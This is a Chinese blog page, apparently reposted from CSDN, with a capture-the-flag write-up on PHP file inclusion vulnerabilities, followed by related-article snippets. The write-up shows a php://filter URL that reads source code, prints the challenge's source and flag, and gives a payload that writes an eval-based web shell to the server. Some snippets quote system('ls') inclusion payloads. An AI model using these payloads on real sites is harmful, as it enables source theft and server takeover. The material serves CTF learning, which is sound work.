大的php文件包含小网页的方式,【CTF题】使用文件包含漏洞读取网页代码

最新推荐文章于 2022-03-23 11:19:03 发布
最新推荐文章于 2022-03-23 11:19:03 发布
阅读量146 收藏
点赞数
文章标签: 大的php文件包含小网页的方式

【CTF题】使用文件包含漏洞读取网页代码

按照我的理解文件包含漏洞是指网页后端php(或其他)代码中使用了include等文件包含语句,而且所包含的文件由变量控制,恰恰此变量又能通过GET或POST等方式进行修改所造成的。

1.直接包含内有运行代码的文件

比如有一index.php<?php

include $_GET['file'];

?>

那么就可以通过抓包修改file值的办法去运行一些本来不该运行的文件

也可以通过此方法直接输出一些敏感的配置文件和远程包含shell(需要目标主机开启allow_url_fopen)

2.通过PHP内置协议直接读取代码

通过构造如下语句:http://xxx.com/index.php?file=php://filter/read=convert.base64-encode/resource=xxx.php

就能获得xxx.php的代码的base64加密结果,通过base64解密后便可获得xxx.php的代码

题目是南邮网络攻防平台的文件包含题

2675

点击“click me?no”以后:

这里写图片描述

可以看到,url变为了:

出现了?file=show.php

说明可能有文件包含漏洞,so,构建url如下:

得到了index.php的base64加密后的代码

2675

base解密后得到代码:

asdf

error_reporting(0);

if(!$_GET[file]){echo 'click me? no';}

$file=$_GET['file'];

if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){

echo "Oh no!";

exit();

}

include($file);

//flag:nctf{edulcni_elif_lacol_si_siht}

?>

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

可以看到,flag就在这里~

3.写入php文件

使用如下url:

并且在http头里提交<?fputs (fopen("shell.php","w"),"<?php eval($_post['xxx'];?>")?>

就能在index.php说在的目录下生成shell.php

--------------------- 本文来自 keysking 的CSDN 博客 ,全文地址请点击:https://blog.csdn.net/keysking/article/details/54728702?utm_source=copy

13661398245
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-web(web_php_include)
分享与记录
05-21 1821
1.目信息 2.代码理解 3.抓包 因为strstr()函数对大小写敏感,所以只需PHP://即可绕过 将post请求的数据当作php代码执行,得到当前目录下的文件 很明显flag在fl4gisisish3r3.php中,于是更改提交的php代码,得到flag ...
络攻防路7-xctf php_include
大紫明宫空离境
11-17 156
一Web_php_include 此次考察PHP基本语法 二 步骤 1 进入试界面 2 访问/?page=http://127.0.0.1/?hello=<?system("ls");?> 3 访问?page=http://127.0.0.1/?hello=<?show_source("fl4gisisish3r3.php");?> 三 总结 解需要了解include strstr str_replace system("ls") show_sour..
【XCTF高手进阶区】web4_Web_php_include writeup(一)
Mitchell_Donovan的博客
01-27 325
web4_Web_php_include 原链接 key:文件包含 ①页面打开后是一串php代码???? <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 先来简单了解一下本涉及到的几个ph
91.91p06./index.php?,CTF--zip伪加密
weixin_36431035的博客
03-23 1423
###一.BUGKUWEB1. 变量1知识点php两个$$是 可变变量,就是一个变量的变量名可以动态的设置和使用 $GLOBALS一个包含了全部变量的全局组合数组。变量的名字就是数组的键include "flag.php"; //包含flag.php这个文件$a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值if(!...
BUUCTF[极客大挑战2019]Secret File
weixin_45253622的博客
05-06 162
查看源码: 出现了两个跳转。 Archive_room.php end.php 输入flag.php 没有,我们分别抓包看看。
ctfCTF理论考核及答案
07-05
12. **ASCII码**:ASCII码包括可打印和不可打印字符,大小写字母连续编码,小写字母的码值大于相应的大写字母。C选项错误,ASCII码不适用于汉字编码。 13. **编码类型**:"Y3Rme2l0J3MgfQ= = "是BASE64编码。 14. ...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
了解如何防范SQL注入、命令注入和文件包含注入至关重要。 2. **变量和作用域**:理解PHP中的变量如何工作,以及全局、局部、静态和超全局变量的作用域,有助于识别可能导致安全问代码片段。 3. **文件操作**:...
ctfhub web全部做记录(持续跟新)
01-08
【总结】在CTF Web挑战中,了解信息泄露、备份文件、源码解析、文件后缀、vim缓存、版本控制、弱口令、SQL注入、文件上传漏洞等概念至关重要。掌握这些技能可以帮助参赛者在比赛中发现并利用安全漏洞,获取flag。...
BrixelCTF2020:brixel CTF 2020 的源文件和文章
05-31
挑战中可能包含SQL注入、跨站脚本(XSS)、文件包含漏洞等经典安全问。学会如何预防和检测这些漏洞,比如使用预编译的SQL语句防止SQL注入,或者理解`htmlspecialchars()`函数如何防止XSS攻击,将极大地帮助我们解决...
80.WHUCTF之WEB类解思路WP(代码审计、文件包含、过滤绕过、SQL注入)_杨秀璋的专栏-CSDN博客1
08-03
PHP文件包含漏洞允许攻击者通过可控的变量来加载任意文件,可能包括系统文件或远程文件。作者可能分享了如何发现和利用此类漏洞,以及如何防止过滤绕过。 4. **ezinclude**: 这个目涉及文件包含漏洞,攻击者...
渗透测试面试
吃个榴莲压压鲸的博客
03-23 2万+
渗透篇 1、介绍一下自认为有趣的挖洞经历 挖洞也有分很多种类型,一种是以渗透、一种是以找漏洞为主,如果是前者会想各种办法获取权限继而获取想要的的东西完成渗透目标,这类跟HW类似,目标各种漏洞不算,要有Shell,服务器权限才给分,这才是最接近实战渗透,跟某部门有合作的话也是属于这种打击络犯罪获得权限、传销数据、组织架构,服务器权限、等...... 2、你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案? SQL注入、密码组合,前者防护分为几种,CDN -> Web
文件包含漏洞
Y-Y-K的博客
04-15 1594
文件包含漏洞文件包含漏洞分类本地文件包含(LFI)原因相关函数(php)利用绕过远程文件包含(RFI)原因利用伪协议Phar://(php归档)Zip://php://filter:php://input:日志文件包含访问日志SSH logsession包含条件利用例临时文件利用例environ条件利用fd自包含php7SegmentFault绕过(上面讲过的方法同样适用)编码绕过 文件包含漏...
PHP文件包含漏洞利用思路与Bypass总结手册(三)
蚁景网安学院
05-06 493
绕过姿势我们平常很多时候碰到的情况肯定不会是简单的include $_GET['file'];这样直接把变量传入包含函数的。在很多时候包含的变量/文件不是完全可控的。现在...
HTML中include file标签的用法
软件工程 plus 人工智能
01-18 1万+
  参数  PathType  将 FileName 的路径类型。路径可为以下某种类型:  路径类型 含义  文件 该文件名是带有 #include 命令的文档所在目录的相对路径。被包含文件可位于相同目录或子目录中;但它不能处于带有 #include 命令的页的上层目录中。  虚拟 文件名为 Web 站点上虚拟目录的完整虚拟路径。  FileName  指定要包含文件名。FileName 必须包
文件上传及文件包含
Jeromeyoung
01-16 1512
文章目录文件包含漏洞测试代码远程文件包含本地文件包含本地包含图片马实例本地包含绕过1、包含漏洞上传技巧(一句话图片马等)2、包含日志文件3、PHP包含文件4、PHP包含文件(详解如下)5、包含截断绕过6、str_replace函数绕过(字符拼接)7、fnmatch函数绕过(通过内置协议)PHP内置协议 文件包含漏洞 简介: 包含操作,在大多数Web语言中都会提供的功能,但PHP对于包含文件所提供的功能太强大,太灵活,所以包含漏洞经常出现在PHP语言中,这也就导致了出现了一个错误现状,很多初学者认为包含
ctf读取index.php,CTF/CTF练习平台-flag在index里【php://filter的利用】,ctf-flag
weixin_36121078的博客
03-10 1712
CTF/CTF练习平台-flag在index里【php://filter的利用】,ctf-flag原内容:http://120.24.86.145:8005/post/Mark一下这道,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这里总结下自己的理解:首先打开这道,页面只给你click me? no点击进去显示test5第一步,查看源代码,无果第二步bp,无果结合到目...
BugkuCTF–flag在index里
热门推荐
超人学飞的日子
06-05 4万+
目地址http://120.24.86.145:8005/post/这道目里有经典的本地文件包含漏洞+php伪协议的结合应用点击后注意到url地址  http://120.24.86.145:8005/post/index.php?file=show.php这是一个典型的文件包含漏洞,(file关键字是提示,其实也是CTF的套路)。这里用到了php的封装协议:http://php.net/ma...
ctf-攻防世界-web:Web_php_include
一只菜鸟的博客
11-21 5752
先看目标php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码
ctf比赛中,常见的文件包含漏洞的做法
最新发布
08-24
### 回答1: CTF 比赛中常见的文件...总之,在CTF比赛中,常见的文件包含漏洞攻击方式主要包括路径遍历、远程文件包含和用户输入导致的漏洞。为了保护系统安全,开发者需要进行合适的输入验证、输出过滤和权限控制。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值